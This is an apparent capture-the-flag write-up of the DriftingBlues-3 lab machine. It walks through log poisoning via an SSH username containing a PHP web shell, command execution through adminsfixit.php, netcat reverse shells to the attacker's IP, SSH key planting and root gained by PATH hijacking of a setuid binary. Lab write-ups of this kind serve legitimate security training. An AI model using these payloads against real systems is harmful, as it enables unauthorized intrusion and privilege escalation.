## Version 1.4.1
## language: en

Feature:
  TOE:
    driftingblue-3
  Category:
    Improper Neutralization of Special Elements used in a Command
    ('Command Injection')
  Location:
    http://driftingblues.box/blog/wp-admin/theme-install.php?browse=new
  CWE:
    CWE-78: CWE-78: Improper Neutralization of Special Elements used in an OS
    Command ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/products/rules/list/173/
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better avoid putting in the web server files which could be modified
    by external sources and omit all the harmful inputs which allow to an
    attacker execute commands inside the system

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Nmap                       | 7.91     |
    | Gobuster                   | 3.0.1    |
    | netcat                     | 1.10     |
    | Burp Suit Community Edition| 2021.2.1 |
    | stegcracker                | 2.1.0    |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on virtualbox
    And I saw that the machine was running Debian 10 [evidence](01.png)
    When I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet1
    """
    Then I got the next result
    """
    vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
    inet 172.16.33.1/29 brd 172.16.33.7 scope global vmnet1
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:1/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 172.16.33.0/29
    """
    And I got the next result
    """
    Nmap scan report for 172.16.33.1
    Host is up (0.0012s latency).
    Nmap scan report for 172.16.33.4
    Host is up (0.00022s latency).
    """
    Then I knew that 172.16.33.4 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -p- -A -sV 172.16.33.5
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
    |   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
    |_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    | http-robots.txt: 1 disallowed entry
    |_/eventadmins
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that port 80 was used by HTTP with Apache in its version 2.4.38
    And SSH was using openSSH in its version 7.9 on port 22

  Scenario: Normal use case
    Given HTTP was working on port 80
    When I accessed to the main webpage on 172.16.33.4:80 using browser
    Then there I saw the following web site [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I downloaded the image in the main webpage
    And I analyzed that image with stegcracker to search embedded files
    But I didn't found any hidden message
    Then I decided to search possible hidden directories with gobuster
    And I got the following result
    """
    ===============================================================
    2021/04/09 11:04:46 Starting gobuster in directory enumeration mode
    ===============================================================
    /wp-admin     (Status: 301) [Size: 313]
    /index.html   (Status: 200) [Size: 1373]
    /privacy      (Status: 301) [Size: 312]
    /.            (Status: 200) [Size: 1373]
    /phpmyadmin   (Status: 301) [Size: 315]
    /robots.txt   (Status: 200) [Size: 37]
    /secret       (Status: 301) [Size: 311]
    /drupal       (Status: 301) [Size: 311]
    /tickets.html (Status: 200) [Size: 347]
    /Makefile     (Status: 200) [Size:11]
    ===============================================================
    2021/04/09 11:06:29 Finished
    ===============================================================
    """
    Then I entered to the wp-admin directory
    And I found the readme.html file
    Then I inspected its content [evidence](03.png)
    But I didn't find any suspicious
    Then I accessed to the privacy directory
    And I looked the following message [evidence](04.png)
    Then I inspected its source code
    But I didn't discover anything
    Then I entered to the phpmyadmin directory
    Then I saw the next sentence [evidence](05.png)
    But I didn't visualize something wrong
    Then I accessed to the drupal directory
    Then I watched a strange message [evidence](06.png)
    But I didn't locate any suspicious
    Then I entered to the Makefile directory
    And I looked the following sentence [evidence](07.png)
    Then I accessed to the secret directory
    And I saw the next message [evidence](08.png)
    And I searched hidden directories
    And I got the result below
    """
    ===============================================================
    2021/04/09 11:50:26 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html           (Status: 200) [Size: 90]
    /.                    (Status: 200) [Size: 90]
    /devices              (Status: 200) [Size: 20]
    ===============================================================
    2021/04/09 11:52:10 Finished
    ===============================================================
    """
    When I entered to the devices directory
    Then I visualized the next message [evidence](09.png)
    But I didn't identify any wrong
    Then I inspected the robots.txt file
    And I saw that it was mentioned another directory [evidence](10.png)
    Then I accessed to that directory [evidence](11.png)
    And I looked that it was suggested inspecting littlequeenofspades.html file
    Then I checked that file
    And I analyzed its source code using Burp Suite
    Then I identified an encoded message
    And thus I could find another hidden file [evidence](12.png)
    Then I visualized the adminsfixit.php file
    And I realized that the /var/log/auth.log file was shown
    Then I connected through SSH
    And I noted that the adminsfixit.php file was updated in real time
    Then I tried logging through SSH with the command below
    """
    ssh '<?php system($_GET['c']); ?>'@172.16.33.4
    """
    Then I used the following payload to know which was the path
    """
    adminsfixit.php?c=pwd
    """
    And I got the next response [evidence](13.png)
    And thus I checked that I could execute commands in the system remotely
    Then I put the port 1234 in listening mode using netcat

  Scenario: Exploitation
    Given previously I'd put port 1234 in listening mode
    When I executed the payload below
    """
    adminsfixit.php?c=nc -e /bin/sh 172.16.33.1 1234
    """
    Then I got remote connection [evidence](14.png)
    When I visualized the /etc/passwd file
    Then I identified robertj user [evidence](15.png)
    And I listed files in the robertj home directory
    """
    drwxr-xr-x 3 robertj robertj 4096 Jan  4 11:25 .
    drwxr-xr-x 3 root    root    4096 Jan  4 06:02 ..
    drwx---rwx 2 robertj robertj 4096 Jan  4 11:23 .ssh
    -r-x------ 1 robertj robertj 1805 Jan  3 11:56 user.txt
    """
    When I analyzed the previous output
    Then I realized that I could create or modify files in the .ssh directory
    And I accessed to that directory which was empty
    Then I created a ssh key
    And I sent the public key to that directory [evidence](16.png)
    And I added that key to the authorized_keys file
    And I logged through SSH using the user robertj
    And thus I got access to the user robertj [evidence](17.png)
    When I visualized the user.txt file
    Then I found out the first flag [evidence](18.png)
    When I checked if that user could execute sudo command
    """
    -bash: sudo: command not found
    """
    Then I comprobated that sudo command wasn't enabled
    When I inspected which groups that user belonged
    Then I looked the following groups
    """
    robertj operators
    """
    When I searched which files belonged to the operators' group
    Then I found the next file
    """
    find -group operators 2> /dev/null
    ./usr/bin/getinfo
    """
    And I checked its permissions
    """
    -r-sr-s--- 1 root operators 16704 Jan  4 11:05 /usr/bin/getinfo
    """
    And thus I saw that it had the setuid permission enable
    When I executed that file
    Then I looked the following information [evidence](19.png)
    And I realized that it was showing information about ip configuration
    And it was visualizing the /etc/hosts files
    And it was executing the next command to print information about kernel
    """
    uname -a
    """
    Then I created a file in the tmp directory
    And I named that file as uname
    Then I added the following command to that file
    """
    nc -e /bin/sh 172.16.33.1 1234
    """
    And I assigned execution permissions to that file
    And I added that route to the PATH variable with the command below
    """
    PATH=/tmp:$PATH
    """
    Then I put the port 1234 in listening mode
    Then I executed getinfo file one more time
    And I got the remote connection with the root privileges [evidence](20.png)
    Then I listed files in the root directory
    And I visualized the second flag
    And thus I solved the challenge [evidence](21.png)

  Scenario: Remediation
    Given that files with sensitive information are accessed to the public
    And the system doesn't discard harmful inputs
    And permissions aren't assigned correctly
    Then it'd better avoid putting sensitive files in the web server
    And omit inputs that are dangerous for the system
    And assign files permission in a better way to avoid security fails

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.9/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.7/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.6/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-04-09
